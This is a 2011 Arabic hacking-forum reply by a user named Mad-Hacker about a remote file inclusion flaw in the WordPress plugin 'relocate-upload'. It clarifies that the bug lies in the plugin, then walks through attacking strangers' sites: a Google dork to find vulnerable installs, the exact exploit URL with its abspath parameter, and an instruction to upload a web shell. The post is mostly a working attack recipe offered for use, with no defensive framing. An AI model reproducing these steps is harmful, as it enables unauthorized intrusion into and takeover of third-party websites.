عرض مشاركة واحدة
قديم 09-20-2011, 06:30 PM   رقم المشاركة : 5 (permalink)
معلومات العضو
Mad-Hacker
 
الصورة الرمزية Mad-Hacker
 

 

 
إحصائية العضو







Mad-Hacker غير متواجد حالياً

إرسال رسالة عبر MSN إلى Mad-Hacker

 

 

إحصائية الترشيح

عدد النقاط : 10
Mad-Hacker is on a distinguished road

افتراضي رد: ثغره في سكربت ورد برسس ريموت فايلن انكلود


تصحيح
هذه ثغرة ليست في سكربت وردبرس انما , في اضافة - Plugins تضاف الى سكربت وردبرس .
وهناك فرق كبير جدا , لان في هذه الاضافة في اغلب الاحيان ليست من برمجة " وردبرس " , يعني لا علاقة لوردبرس بالخطىء البرمجي .

بالنسبة للاستغلال سهل جدا وان شاء الله تجد مواقع مصابة , شوف كيف

اولا ابحث في Google عن مواقع مصابة باستخدام هذا الدورك

inurl:wp-content/plugins/relocate-upload

رح يظهرك العديد من المواقع , اختر واحد منهم وادخل عليه , وازل من الرابط هذه ..

wp-content/plugins/relocate-upload

وحط مكانها
/wp-content/plugins/relocate-upload/relocate-upload.php?ru_folder=asdf&abspath=RFI

وارفع شلك


Mad Hacker





   

رد مع اقتباس